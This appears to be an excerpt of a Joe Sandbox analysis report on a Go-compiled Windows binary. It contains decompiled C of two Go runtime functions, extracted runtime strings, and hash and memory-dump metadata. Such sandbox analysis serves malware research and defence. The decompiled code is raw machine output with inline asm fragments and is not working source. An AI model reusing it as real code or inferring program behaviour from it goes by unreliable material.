                                                                                                                            • mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinepotentially overlapping in-use allocations detectedruntime:, xrefs: 0130B5D8
                                                                                                                            • mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset, xrefs: 0130B5A5
                                                                                                                            • delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unexpected string after package name: runtime: unexpe, xrefs: 0130B55C
                                                                                                                            • malloc deadlockmisaligned maskmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p alre, xrefs: 0130B5C7
                                                                                                                            • malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer , xrefs: 0130B5B6
                                                                                                                            • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 0130B0B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-713770572
                                                                                                                            • Opcode ID: e1e5c1c5ce2c7ddd09937572932f827009167956fb5d9c748ed744041a821a6e
                                                                                                                            • Instruction ID: 0444216ff6c05b1b21d5a3aba364ec20a779e11f9bbf5362c435536449eb9458
                                                                                                                            • Opcode Fuzzy Hash: e1e5c1c5ce2c7ddd09937572932f827009167956fb5d9c748ed744041a821a6e
                                                                                                                            • Instruction Fuzzy Hash: 5D32B476208B84C2EB56CB19E4507AAFBA5F389BD8F588116DF9D43BA9DB3CC444C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E0131B3A0(long long __rax, long long __rbx, long long __rcx, intOrPtr __rdx, long long __rbp, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24) {
                                                                                                                            				char _v8;
                                                                                                                            				unsigned int _v16;
                                                                                                                            				unsigned int _v24;
                                                                                                                            				unsigned int _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v56;
                                                                                                                            				void* _t47;
                                                                                                                            				void* _t49;
                                                                                                                            				void* _t71;
                                                                                                                            				void* _t75;
                                                                                                                            				void* _t76;
                                                                                                                            				void* _t77;
                                                                                                                            				void* _t79;
                                                                                                                            				intOrPtr _t87;
                                                                                                                            				unsigned int _t104;
                                                                                                                            				intOrPtr _t107;
                                                                                                                            				long long _t115;
                                                                                                                            				intOrPtr _t117;
                                                                                                                            				unsigned int _t118;
                                                                                                                            				char* _t124;
                                                                                                                            				void* _t126;
                                                                                                                            				void* _t129;
                                                                                                                            				void* _t130;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t130 = __r14;
                                                                                                                            					_t129 = __r11;
                                                                                                                            					_t105 = __rcx;
                                                                                                                            					_t102 = __rbx;
                                                                                                                            					_t85 = __rax;
                                                                                                                            					if(_t126 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L17:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					_a24 = __rcx;
                                                                                                                            					E01356200(__rdx, __rbp);
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t124 =  &_v8;
                                                                                                                            				_t4 = __rax + 0xb0;
                                                                                                                            				 *_t4 = __rdx;
                                                                                                                            				_t6 = __rax + 0xb8;
                                                                                                                            				 *_t6 =  *_t4;
                                                                                                                            				 *((intOrPtr*)(__rax + 0xc0)) =  *_t6;
                                                                                                                            				asm("inc esp");
                                                                                                                            				asm("inc esp");
                                                                                                                            				 *((long long*)(__rax + 0xe8)) = 0;
                                                                                                                            				 *((long long*)(__rax + 0xf0)) = __rbx;
                                                                                                                            				 *((long long*)(__rax + 0x90)) =  *((intOrPtr*)(__rax + 0x98));
                                                                                                                            				_t115 =  *((intOrPtr*)(__rax + 0x78)) + 0x10000;
                                                                                                                            				_t79 =  *((intOrPtr*)(__rax + 0x68)) - _t115;
                                                                                                                            				if(_t79 < 0) {
                                                                                                                            					 *((long long*)(__rax + 0x68)) = _t115;
                                                                                                                            				}
                                                                                                                            				asm("xorps xmm0, xmm0");
                                                                                                                            				asm("repne dec eax");
                                                                                                                            				asm("movsd xmm1, [0xfb07e]");
                                                                                                                            				asm("mulsd xmm1, xmm0");
                                                                                                                            				asm("movsd xmm2, [0xfb082]");
                                                                                                                            				asm("addsd xmm2, xmm1");
                                                                                                                            				asm("repne dec eax");
                                                                                                                            				 *((long long*)(_t85 + 0xf8)) = _t115;
                                                                                                                            				asm("xorps xmm2, xmm2");
                                                                                                                            				asm("repne dec eax");
                                                                                                                            				asm("movups xmm3, xmm2");
                                                                                                                            				asm("divsd xmm2, xmm1");
                                                                                                                            				asm("movsd xmm4, [0xfb07b]");
                                                                                                                            				asm("subsd xmm2, xmm4");
                                                                                                                            				asm("movsd xmm4, [0xfb0df]");
                                                                                                                            				asm("ucomisd xmm4, xmm2");
                                                                                                                            				if(_t79 > 0) {
                                                                                                                            					L5:
                                                                                                                            					asm("ucomisd xmm3, xmm1");
                                                                                                                            					if(_t79 > 0) {
                                                                                                                            						 *((long long*)(_t85 + 0xf8)) = _t115 - 1;
                                                                                                                            					}
                                                                                                                            					asm("xorps xmm2, xmm2");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            					asm("subsd xmm1, xmm2");
                                                                                                                            					asm("divsd xmm1, xmm0");
                                                                                                                            					asm("movsd [eax+0x110], xmm1");
                                                                                                                            				} else {
                                                                                                                            					asm("movsd xmm4, [0xfb039]");
                                                                                                                            					asm("ucomisd xmm2, xmm4");
                                                                                                                            					if(_t79 <= 0) {
                                                                                                                            						asm("xorps xmm0, xmm0");
                                                                                                                            						asm("movsd [eax+0x110], xmm0");
                                                                                                                            					} else {
                                                                                                                            						goto L5;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				if( *0x14cf798 > 0) {
                                                                                                                            					 *((long long*)(_t85 + 0xf8)) = _t105;
                                                                                                                            					asm("xorps xmm0, xmm0");
                                                                                                                            					asm("movsd [eax+0x110], xmm0");
                                                                                                                            				}
                                                                                                                            				_t107 =  *0x147b560; // 0xc00001c000
                                                                                                                            				_t117 =  *0x147b568; // 0x4
                                                                                                                            				while(_t102 < _t117) {
                                                                                                                            					asm("inc esp");
                                                                                                                            					_t102 = _t102 + 1;
                                                                                                                            				}
                                                                                                                            				_a8 = _t85;
                                                                                                                            				_t49 = E0131B680(_t47, _t85, _t107, _t129);
                                                                                                                            				if( *0x14cf790 > 0) {
                                                                                                                            					_t87 = _a8;
                                                                                                                            					_t108 =  *((intOrPtr*)(_t87 + 0x100));
                                                                                                                            					_v56 =  *((intOrPtr*)(_t87 + 0x100));
                                                                                                                            					_t118 =  *0x14cfce0; // 0x168d0
                                                                                                                            					_v16 = _t118;
                                                                                                                            					_t104 =  *0x147b9e8; // 0x0
                                                                                                                            					_v24 = _t104;
                                                                                                                            					_v32 =  *((intOrPtr*)(_t87 + 0x68));
                                                                                                                            					_v40 =  *((intOrPtr*)(_t87 + 0xf8));
                                                                                                                            					asm("movsd xmm0, [eax+0x110]");
                                                                                                                            					asm("movsd [esp+0x18], xmm0");
                                                                                                                            					E01332340(_t118, _t124, _t130);
                                                                                                                            					E01332C40(_t71, _t75, _t76, _t77, 0x13899a0, _t104, _t124, _t130);
                                                                                                                            					asm("dec ax");
                                                                                                                            					L01332640(_t71, _t75, _t76, _t77, _t104,  *((intOrPtr*)(_t87 + 0x100)), _t118,  *((intOrPtr*)(_t87 + 0xf8)), _t124, _t130);
                                                                                                                            					E01332C40(_t71, _t75, _t76, _t77, 0x1386d43, _t104, _t124, _t130);
                                                                                                                            					E01332940(_t75, _t76, _t77, _v16 >> 0x14,  *((intOrPtr*)(_t87 + 0x100)), _t124, _t130);
                                                                                                                            					E01332C40(_t71, _t75, _t76, _t77, 0x1386d51, _t104, _t124, _t130);
                                                                                                                            					E01332940(_t75, _t76, _t77, _v24 >> 0x14,  *((intOrPtr*)(_t87 + 0x100)), _t124, _t130);
                                                                                                                            					E01332C40(_t71, _t75, _t76, _t77, 0x13867b5, _t104, _t124, _t130);
                                                                                                                            					E01332940(_t75, _t76, _t77, _v32 >> 0x14, _t108, _t124, _t130);
                                                                                                                            					E01332C40(_t71, _t75, _t76, _t77, 0x1387dde, _t104, _t124, _t130);
                                                                                                                            					E01332A40(_t71, 0, _t75, _t76, _t77, _v40,  *((intOrPtr*)(_t87 + 0x68)), _t124, _t130);
                                                                                                                            					E01332C40(_t71, _t75, _t76, _t77,  &M0138678B, _t104, _t124, _t130);
                                                                                                                            					asm("movsd xmm0, [esp+0x18]");
                                                                                                                            					L01332640(_t71, _t75, _t76, _t77, _t104, _t108, _t118,  *((intOrPtr*)(_t87 + 0xf8)), _t124, _t130);
                                                                                                                            					E013325A0(_t71, 0, _t75, _t76, _t77, _t124, _t130);
                                                                                                                            					_t49 = L013323C0(_t118, _t124, _t130);
                                                                                                                            				}
                                                                                                                            				return _t49;
                                                                                                                            			}



























                                                                                                                            Strings
                                                                                                                            • pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCoun, xrefs: 0131B566
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 0131B605
                                                                                                                            • ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKS, xrefs: 0131B5C5
                                                                                                                            • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaR, xrefs: 0131B586
                                                                                                                            • MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_Gondi, xrefs: 0131B5E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaR$ MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_Gondi$+,-./0:<=?CLMPSZ[\$->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKS$pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCoun
                                                                                                                            • API String ID: 0-3856851786
                                                                                                                            • Opcode ID: 1f3aeb9e3a43c0569941fd6f04319a0c42f8e3562d08eeb3012c119fb1c737c6
                                                                                                                            • Instruction ID: 35cf77f376a5640d6bedc8a4ac02cd8393356362ca0618dc0fdffe9916d8717f
                                                                                                                            • Opcode Fuzzy Hash: 1f3aeb9e3a43c0569941fd6f04319a0c42f8e3562d08eeb3012c119fb1c737c6
                                                                                                                            • Instruction Fuzzy Hash: 4C617F72504F8589D606EF29E48039AB7A5FBAABC4F05D236EA4E17739DF38C090C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 48%
                                                                                                                            			E01334F00(char __ebx, signed char __ecx, void* __edi, void* __esp, void* __eflags, long long __rax, signed long long __rbx, signed long long __rcx, long long __rdx, long long __rbp, void* _a8, char _a16, signed char _a20) {
                                                                                                                            				char _v8;
                                                                                                                            				signed char _v12;
                                                                                                                            				intOrPtr _v16;
                                                                                                                            				char _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				signed long long _v48;
                                                                                                                            				char _v72;
                                                                                                                            				long long _v80;
                                                                                                                            				signed long long _v88;
                                                                                                                            				char _t70;
                                                                                                                            				void* _t74;
                                                                                                                            				char _t87;
                                                                                                                            				signed char _t93;
                                                                                                                            				void* _t98;
                                                                                                                            				intOrPtr _t99;
                                                                                                                            				signed char _t100;
                                                                                                                            				signed char _t102;
                                                                                                                            				void* _t103;
                                                                                                                            				void* _t104;
                                                                                                                            				void* _t106;
                                                                                                                            				void* _t107;
                                                                                                                            				void* _t109;
                                                                                                                            				void* _t116;
                                                                                                                            				long long _t117;
                                                                                                                            				void* _t121;
                                                                                                                            				intOrPtr _t123;
                                                                                                                            				long long _t130;
                                                                                                                            				signed long long _t135;
                                                                                                                            				signed long long _t138;
                                                                                                                            				signed long long _t141;
                                                                                                                            				long long _t143;
                                                                                                                            				signed long long _t144;
                                                                                                                            				intOrPtr _t152;
                                                                                                                            				long long _t154;
                                                                                                                            				intOrPtr _t155;
                                                                                                                            				signed long long _t157;
                                                                                                                            				char* _t160;
                                                                                                                            				intOrPtr* _t162;
                                                                                                                            				signed long long _t163;
                                                                                                                            				void* _t164;
                                                                                                                            				void* _t165;
                                                                                                                            				void* _t166;
                                                                                                                            				void* _t167;
                                                                                                                            				intOrPtr _t177;
                                                                                                                            				void* _t183;
                                                                                                                            
                                                                                                                            				_t143 = __rdx;
                                                                                                                            				_t138 = __rcx;
                                                                                                                            				_t135 = __rbx;
                                                                                                                            				_t117 = __rax;
                                                                                                                            				_t107 = __esp;
                                                                                                                            				_t103 = __edi;
                                                                                                                            				_t93 = __ecx;
                                                                                                                            				_t87 = __ebx;
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t160 =  &_v8;
                                                                                                                            				_a8 = __rax;
                                                                                                                            				_a20 = __ecx;
                                                                                                                            				_a16 = __ebx;
                                                                                                                            				asm("bt ebx, 0xc");
                                                                                                                            				if(__eflags < 0) {
                                                                                                                            					L3:
                                                                                                                            					asm("inc esp");
                                                                                                                            					_v24 = 0x13352a0;
                                                                                                                            					_v16 = _t87;
                                                                                                                            					_v12 = _t93;
                                                                                                                            					 *_t162 =  &_v24;
                                                                                                                            					E013560C0(_t87, _t93, _t98, _t103, _t104, _t106, _t107, _t116, _t160, _t164, _t165, _t166, _t167, _t183);
                                                                                                                            					asm("inc ebp");
                                                                                                                            					_t117 = _a8;
                                                                                                                            					_t93 = _a20;
                                                                                                                            					_t87 = _a16;
                                                                                                                            					L4:
                                                                                                                            					_t99 = 0;
                                                                                                                            					while(1) {
                                                                                                                            						_t152 = _t117;
                                                                                                                            						_t70 = _t87;
                                                                                                                            						asm("lock cmpxchg [edi+0x90], ecx");
                                                                                                                            						r8b = _t109 == 0;
                                                                                                                            						if(r8b != 0) {
                                                                                                                            							goto L14;
                                                                                                                            						}
                                                                                                                            						if(_t87 != 4 ||  *((intOrPtr*)(_t152 + 0x90)) != 1) {
                                                                                                                            							_v32 = _t143;
                                                                                                                            							if(_t143 == 0) {
                                                                                                                            								_t70 = E0135A180(_t70);
                                                                                                                            								asm("inc ebp");
                                                                                                                            								_t20 =  *_t162 + 0x1388; // 0x1388
                                                                                                                            								_t154 = _t20;
                                                                                                                            							}
                                                                                                                            							_v40 = _t154;
                                                                                                                            							E0135A180(_t70);
                                                                                                                            							asm("inc ebp");
                                                                                                                            							_t177 =  *((intOrPtr*)( *[gs:0x28]));
                                                                                                                            							_t123 = _v40;
                                                                                                                            							if( *_t162 >= _t123) {
                                                                                                                            								 *_t162 = 0x1401740;
                                                                                                                            								_t74 = E013560C0(_t87, _t93, _t99, _t103, 0, _t106, _t107, _t116, _t160, _t164, _t165, _t166, _t177, _t183);
                                                                                                                            								asm("inc ebp");
                                                                                                                            								E0135A180(_t74);
                                                                                                                            								asm("inc ebp");
                                                                                                                            								_t177 =  *((intOrPtr*)( *[gs:0x28]));
                                                                                                                            								_t25 =  *_t162 + 0x9c4; // 0x9c4
                                                                                                                            								_t154 = _t25;
                                                                                                                            								goto L5;
                                                                                                                            							} else {
                                                                                                                            								_t99 = _a16;
                                                                                                                            								_t155 = _a8;
                                                                                                                            								L37:
                                                                                                                            								if(_t138 >= 0xa) {
                                                                                                                            									L39:
                                                                                                                            									_t154 = _t123;
                                                                                                                            									L5:
                                                                                                                            									_t143 = _v32 + 1;
                                                                                                                            									_t117 = _a8;
                                                                                                                            									_t93 = _a20;
                                                                                                                            									_t87 = _a16;
                                                                                                                            									continue;
                                                                                                                            								}
                                                                                                                            								_t109 =  *((intOrPtr*)(_t155 + 0x90)) - _t99;
                                                                                                                            								if(_t109 != 0) {
                                                                                                                            									L36:
                                                                                                                            									_v48 = _t138;
                                                                                                                            									 *_t162 = 1;
                                                                                                                            									E01357FE0();
                                                                                                                            									asm("inc ebp");
                                                                                                                            									_t138 = _v48 + 1;
                                                                                                                            									_t123 = _v40;
                                                                                                                            									_t99 = _a16;
                                                                                                                            									_t155 = _a8;
                                                                                                                            									goto L37;
                                                                                                                            								}
                                                                                                                            								goto L39;
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							_t130 = 0x138e5f0;
                                                                                                                            							E01330BA0(0x138e5f0, _t135, _t160);
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							asm("int3");
                                                                                                                            							L41:
                                                                                                                            							__eflags = _t162 -  *((intOrPtr*)(_t177 + 0x10));
                                                                                                                            							if(_t162 >  *((intOrPtr*)(_t177 + 0x10))) {
                                                                                                                            								_t162 = _t162 - 0x28;
                                                                                                                            								_v72 = _t160;
                                                                                                                            								_t160 =  &_v72;
                                                                                                                            								_v80 = _t130;
                                                                                                                            								_v88 = _t138;
                                                                                                                            								E01332340(_t143, _t160, _t177);
                                                                                                                            								E01332C40( *((intOrPtr*)(_t143 + 8)), _t103, 0, _t107, 0x138baf4, _t135, _t160, _t177);
                                                                                                                            								L01332AA0(_t99, _t103, _t107, _v88, _t138, _t160, _t177);
                                                                                                                            								E01332C40( *((intOrPtr*)(_t143 + 8)), _t103, 0, _t107, 0x1386f6d, _t135, _t160, _t177);
                                                                                                                            								L01332AA0(_t99, _t103, _t107, _v80, _t138, _t160, _t177);
                                                                                                                            								E013325A0( *((intOrPtr*)(_t143 + 8)), _t99, _t103, 0, _t107, _t160, _t177);
                                                                                                                            								L013323C0(_t143, _t160, _t177);
                                                                                                                            								_t130 = 0x138c37f;
                                                                                                                            								E01330BA0(0x138c37f, _t135, _t160);
                                                                                                                            							}
                                                                                                                            							E01356160(_t143, _t160);
                                                                                                                            							goto L41;
                                                                                                                            						}
                                                                                                                            						L14:
                                                                                                                            						__eflags = _t87 - 2;
                                                                                                                            						if(_t87 == 2) {
                                                                                                                            							_t100 =  *(_t152 + 0xbd) & 0x000000ff;
                                                                                                                            							__eflags = _t100 & 0x00000007;
                                                                                                                            							if((_t100 & 0x00000007) == 0) {
                                                                                                                            								 *((char*)(_t152 + 0xbc)) = 1;
                                                                                                                            							}
                                                                                                                            							_t102 = ( *(_t152 + 0xbd) & 0x000000ff) + 1;
                                                                                                                            							__eflags = _t102;
                                                                                                                            							 *(_t152 + 0xbd) = _t102;
                                                                                                                            						}
                                                                                                                            						__eflags =  *((char*)(_t152 + 0xbc));
                                                                                                                            						if( *((char*)(_t152 + 0xbc)) == 0) {
                                                                                                                            							L34:
                                                                                                                            							return _t70;
                                                                                                                            						} else {
                                                                                                                            							__eflags = _t87 - 1;
                                                                                                                            							if(_t87 == 1) {
                                                                                                                            								_t70 = E0135A180(_t70);
                                                                                                                            								asm("inc ebp");
                                                                                                                            								_t138 = _a8;
                                                                                                                            								_t35 = _t138 + 0xc8;
                                                                                                                            								 *_t35 =  *(_t138 + 0xc8) +  *_t162 -  *((intOrPtr*)(_t138 + 0xc0));
                                                                                                                            								__eflags =  *_t35;
                                                                                                                            								 *((long long*)(_t138 + 0xc0)) = 0;
                                                                                                                            								_t93 = _a20;
                                                                                                                            								_t152 = _a8;
                                                                                                                            							}
                                                                                                                            							__eflags = _t93 - 1;
                                                                                                                            							if(_t93 == 1) {
                                                                                                                            								_t70 = E0135A180(_t70);
                                                                                                                            								asm("inc ebp");
                                                                                                                            								 *((long long*)(_a8 + 0xc0)) =  *_t162;
                                                                                                                            								goto L34;
                                                                                                                            							} else {
                                                                                                                            								__eflags = _t93 - 2;
                                                                                                                            								if(_t93 != 2) {
                                                                                                                            									goto L34;
                                                                                                                            								}
                                                                                                                            								 *((char*)(_t152 + 0xbc)) = 0;
                                                                                                                            								_t144 =  *((intOrPtr*)(_t152 + 0xc8));
                                                                                                                            								__eflags = _t144;
                                                                                                                            								if(_t144 >= 0) {
                                                                                                                            									__eflags = _t144 - 0x10;
                                                                                                                            									if(_t144 < 0x10) {
                                                                                                                            										r8d = 0;
                                                                                                                            										__eflags = r8d;
                                                                                                                            										_t135 = _t144;
                                                                                                                            									} else {
                                                                                                                            										asm("dec eax");
                                                                                                                            										_t135 =  ==  ? 0xffffffff : _t135;
                                                                                                                            										_t157 = _t135 - 3;
                                                                                                                            										_t163 = _t157;
                                                                                                                            										__eflags = _t157 << 4 - 0x2d0;
                                                                                                                            										if(_t157 << 4 < 0x2d0) {
                                                                                                                            											_t141 = _t135 - 4;
                                                                                                                            											__eflags = _t141 - 0x40;
                                                                                                                            											asm("dec eax");
                                                                                                                            											_t138 = _t141 |  !_t135;
                                                                                                                            											_t135 = (_t144 >> _t93) - ((_t144 >> _t93 >> 0x3f >> 0x3c) + _t146 >> 4 << 4);
                                                                                                                            										} else {
                                                                                                                            											r8d = 0x2c;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            									_t163 = _t163 << 4;
                                                                                                                            									_t121 = _t163 + _t135;
                                                                                                                            									__eflags = _t121 - 0x2d0;
                                                                                                                            									if(_t121 >= 0x2d0) {
                                                                                                                            										E013588E0();
                                                                                                                            										goto L36;
                                                                                                                            									} else {
                                                                                                                            										asm("lock dec eax");
                                                                                                                            										L32:
                                                                                                                            										 *((long long*)(_t152 + 0xc8)) = 0;
                                                                                                                            										goto L34;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								_t70 = 1;
                                                                                                                            								asm("lock dec eax");
                                                                                                                            								goto L32;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				asm("bt ecx, 0xc");
                                                                                                                            				if(__eflags < 0) {
                                                                                                                            					goto L3;
                                                                                                                            				}
                                                                                                                            				_t109 = __ebx - __ecx;
                                                                                                                            				if(_t109 != 0) {
                                                                                                                            					goto L4;
                                                                                                                            				}
                                                                                                                            				goto L3;
                                                                                                                            			}

















































                                                                                                                            0x0133511a
                                                                                                                            0x01335132
                                                                                                                            0x01335136
                                                                                                                            0x01335197
                                                                                                                            0x01335197
                                                                                                                            0x0133519a
                                                                                                                            0x01335138
                                                                                                                            0x01335138
                                                                                                                            0x01335143
                                                                                                                            0x01335147
                                                                                                                            0x0133514b
                                                                                                                            0x01335152
                                                                                                                            0x01335159
                                                                                                                            0x01335168
                                                                                                                            0x0133516c
                                                                                                                            0x01335170
                                                                                                                            0x01335176
                                                                                                                            0x01335192
                                                                                                                            0x0133515b
                                                                                                                            0x0133515b
                                                                                                                            0x01335161
                                                                                                                            0x01335159
                                                                                                                            0x0133519d
                                                                                                                            0x013351a1
                                                                                                                            0x013351a5
                                                                                                                            0x013351ab
                                                                                                                            0x01335208
                                                                                                                            0x00000000
                                                                                                                            0x013351ad
                                                                                                                            0x013351bd
                                                                                                                            0x013351c2
                                                                                                                            0x013351c2
                                                                                                                            0x00000000
                                                                                                                            0x013351c2
                                                                                                                            0x013351ab
                                                                                                                            0x0133511c
                                                                                                                            0x01335128
                                                                                                                            0x00000000
                                                                                                                            0x01335128
                                                                                                                            0x013350f5
                                                                                                                            0x013350a2
                                                                                                                            0x01334f91
                                                                                                                            0x01334f22
                                                                                                                            0x01334f26
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01334f28
                                                                                                                            0x01334f2a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            • newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_, xrefs: 013352E8
                                                                                                                            • casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unex, xrefs: 01335270
                                                                                                                            • casgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorresetspinnin, xrefs: 0133530F
                                                                                                                            • runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNor, xrefs: 013352CD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmp
